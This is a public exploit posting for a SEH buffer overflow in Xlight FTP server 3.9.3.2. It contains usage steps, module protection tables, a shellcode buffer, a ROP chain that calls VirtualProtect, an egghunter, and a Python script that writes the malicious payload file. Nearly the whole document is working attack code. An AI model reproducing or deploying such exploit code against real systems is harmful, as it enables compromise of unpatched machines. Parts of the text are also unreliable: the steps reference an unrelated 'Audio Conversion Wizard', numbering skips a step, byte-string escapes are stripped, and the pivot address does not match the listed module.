Authored by Hejap Zairy

Xlight FTP version 3.9.3.2 SEH buffer overflow exploit with egghunter and ROP.

# Exploit Title: Xlight FTP v3.9.3.2 - Buffer Overflow (SEH Egghunter + ROP)
# Exploit Author: Hejap Zairy
# Date: 13.07.2022
# Software Link:   http://www.xlightftpd.com/download/setup.exe
# Tested Version: v3.9.3.2(2022-1-5) 
# Tested on: Windows 10 64bit

# 1.- Run python code : 0day-Hejap_Zairy.py
# 2.- Open 0day_Hejap.txt and copy All content to Clipboard
# 3.- Open Audio Conversion Wizard and press Enter Code
# 5.- Click 'Server ip ' -> 'General' -> 'Advanced' -> 'Excute a program after user logged in ' -> 'Setup'
# 6.- Crashed


# Author  Code By Hejap Zairy
#!/usr/bin/env python
# Auther Hejap Zairy 
#!/usr/bin/env python
import struct


##================================================================================
##  2022-03-12 16:54:06
##================================================================================
##-----------------------------------------------------------------------------------------------------------------------------------------
## Module info :
##-----------------------------------------------------------------------------------------------------------------------------------------
## Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
##-----------------------------------------------------------------------------------------------------------------------------------------
## 0x76aa0000 | 0x76ae4000 | 0x00044000 | True   | True    | True  |  False   | True   | 10.0.17763.1 [SHLWAPI.dll] (C:WindowsSystem32SHLWAPI.dll)
## 0x76970000 | 0x76a93000 | 0x00123000 | True   | True    | True  |  False   | True   | 10.0.17763.1490 [ucrtbase.dll] (C:WindowsSystem32ucrtbase.dll)
## 0x766a0000 | 0x766bc000 | 0x0001c000 | True   | True    | True  |  False   | True   | 10.0.17763.1075 [profapi.dll] (C:WindowsSystem32profapi.dll)
## 0x76340000 | 0x763c0000 | 0x00080000 | True   | True    | True  |  False   | True   | 10.0.17763.1 [msvcp_win.dll] (C:WindowsSystem32msvcp_win.dll)
## 0x75680000 | 0x757ea000 | 0x0016a000 | True   | True    | True  |  False   | True   | 10.0.17763.1879 [gdi32full.dll] (C:WindowsSystem32gdi32full.dll)
## 0x75a60000 | 0x75bfe000 | 0x0019e000 | True   | True    | True  |  False   | True   | 10.0.17763.1 [CRYPT32.dll] (C:WindowsSystem32CRYPT32.dll)
## 0x74ff0000 | 0x74fff000 | 0x0000f000 | True   | True    | True  |  False   | True   | 10.0.17763.1 [kernel.appcore.dll] (C:WindowsSystem32kernel.appcore.dll)
## 0x00400000 | 0x006d5000 | 0x002d5000 | False  | False   | False |  False   | False  | 3.9.3.2 [xlight.exe] (C:UsersTarnishedDesktopXlightxlight.exe)
## 0x74870000 | 0x74909000 | 0x00099000 | True   | True    | True  |  False   | True   | 10.0.17763.1075 [ODBC32.dll] (C:WindowsSYSTEM32ODBC32.dll)
## 0x74b20000 | 0x74bbc000 | 0x0009c000 | True   | True    | True  |  False   | True   | 10.0.17763.1 [apphelp.dll] (C:WindowsSYSTEM32apphelp.dll)
## 0x76280000 | 0x76297000 | 0x00017000 | True   | True    | True  |  False   | True   | 10.0.17763.1 [win32u.dll] (C:WindowsSystem32win32u.dll)
## 0x75c50000 | 0x761a6000 | 0x00556000 | True   | True    | True  |  False   | True   | 10.0.17763.1911 [SHELL32.dll] (C:WindowsSystem32SHELL32.dll)


##0x006d4270 : kernel32.loadlibrarya | 0x76ce2280 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:UsersTarnishedDesktopXlightxlight.exe)
##0x006d4258 : comdlg32.getopenfilenamea | 0x77226240 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:UsersTarnishedDesktopXlightxlight.exe)
##0x006d427c : kernel32.virtualprotect | 0x76ce0c10 | startnull,asciiprint,ascii {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:UsersTarnishedDesktopXlightxlight.exe)
##0x006d4278 : kernel32.getprocaddress | 0x76ce05a0 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:UsersTarnishedDesktopXlightxlight.exe)
# RopFunc syscall  null 
badchars = [0x00,0x0a,0x0d,0x3a,0xff]

buf =  b""
buf += b"xd9xebx9bxd9x74x24xf4x31xd2xb2x77x31xc9"
buf += b"x64x8bx71x30x8bx76x0cx8bx76x1cx8bx46x08"
buf += b"x8bx7ex20x8bx36x38x4fx18x75xf3x59x01xd1"
buf += b"xffxe1x60x8bx6cx24x24x8bx45x3cx8bx54x28"
buf += b"x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x34"
buf += b"x49x8bx34x8bx01xeex31xffx31xc0xfcxacx84"
buf += b"xc0x74x07xc1xcfx0dx01xc7xebxf4x3bx7cx24"
buf += b"x28x75xe1x8bx5ax24x01xebx66x8bx0cx4bx8b"
buf += b"x5ax1cx01xebx8bx04x8bx01xe8x89x44x24x1c"
buf += b"x61xc3xb2x08x29xd4x89xe5x89xc2x68x8ex4e"
buf += b"x0execx52xe8x9fxffxffxffx89x45x04xbbxef"
buf += b"xcexe0x60x87x1cx24x52xe8x8exffxffxffx89"
buf += b"x45x08x68x6cx6cx20x41x68x33x32x2ex64x68"
buf += b"x75x73x65x72x30xdbx88x5cx24x0ax89xe6x56"
buf += b"xffx55x04x89xc2x50xbbxa8xa2x4dxbcx87x1c"
buf += b"x24x52xe8x5fxffxffxffx68x6fx78x58x20x68"
buf += b"x61x67x65x42x68x4dx65x73x73x31xdbx88x5c"
buf += b"x24x0ax89xe3x68x58x20x20x20x68x61x69x72"
buf += b"x79x68x61x70x20x5ax68x20x48x65x6ax68x30"
buf += b"x64x61x79x31xc9x88x4cx24x10x89xe1x31xd2"
buf += b"x52x53x51x52xffxd0x31xc0x50xffx55x08"


def Hejap_rop_chain():

    Hejap_gadgets = [
      0x75c4f468,  # POP EBX # RETN [windows.storage.dll] ** REBASED ** ASLR 
      0x7731c2a0,  # ptr to &VirtualProtect() [IAT CRYPT32.dll] ** REBASED ** ASLR
      0x75deb176,  # MOV ESI,DWORD PTR DS:[EBX] # RETN [windows.storage.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_ebp:---]
      0x7545eebb,  # POP EBP # RETN [SHLWAPI.dll] ** REBASED ** ASLR 
      0x75ff2bdb,  # & call esp [msvcp_win.dll] ** REBASED ** ASLR
      #[---INFO:gadgets_to_set_ebx:---]
      0x755d53b2,  # POP EAX # RETN [KERNELBASE.dll] ** REBASED ** ASLR 
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x74d241d7,  # NEG EAX # RETN [USER32.dll] ** REBASED ** ASLR 
      0x75e72ff1,  # XCHG EAX,EBX # RETN [windows.storage.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_edx:---]
      0x765a2dad,  # POP EAX # RETN [bcryptPrimitives.dll] ** REBASED ** ASLR 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x75297b65,  # NEG EAX # RETN [gdi32full.dll] ** REBASED ** ASLR 
      0x76a3b05a,  # XCHG EAX,EDX # RETN [SHELL32.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_ecx:---]
      0x72bb29ef,  # POP ECX # RETN [UXTHEME.DLL] ** REBASED ** ASLR 
      0x7774f16b,  # &Writable location [ntdll.dll] ** REBASED ** ASLR
      #[---INFO:gadgets_to_set_edi:---]
      0x77275d3d,  # POP EDI # RETN [CRYPT32.dll] ** REBASED ** ASLR 
      0x75849686,  # RETN (ROP NOP) [KERNEL32.DLL] ** REBASED ** ASLR
      #[---INFO:gadgets_to_set_eax:---]
      0x72bf2465,  # POP EAX # RETN [UXTHEME.DLL] ** REBASED ** ASLR 
      0x90909090,  # nop
      #[---INFO:pushad:---]
      0x76a37959,  # PUSHAD # RETN [SHELL32.dll] ** REBASED ** ASLR 
    ]
    return ''.join(struct.pack('<I', _) for _ in Hejap_gadgets)

egg = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
egg+="xefxb8x68x30x30x70x8bxfaxafx75xeaxafx75xe7xffxe7"
rop_chain = Hejap_rop_chain()
offset = 452
nseh = "x90" * 4  
junk = "A" * (offset - len(nseh))
stackpivot = struct.pack('<I', 0x8e648b26 )  # POP ESP # POP EBP # RETN    ** [xlight.exe
#seh = struct.pack('<I', 0x0019ccb8 ) null

buffer = junk + nseh  +  stackpivot + rop_chain  +  "x90" * 5 +  egg   + 'h00ph00p' + buf + "x90" * (1000 - len(egg)-len(stackpivot))
f = open("0day_hejap.txt", "w")
f.write(buffer)
f.close()


# Proof and Exploit:
https://i.imgur.com/jMURHQF.png
https://i.imgur.com/aw6hZo2.png
#Video
https://streamable.com/gmqz5x



RELATED ARTICLESMORE FROM AUTHOR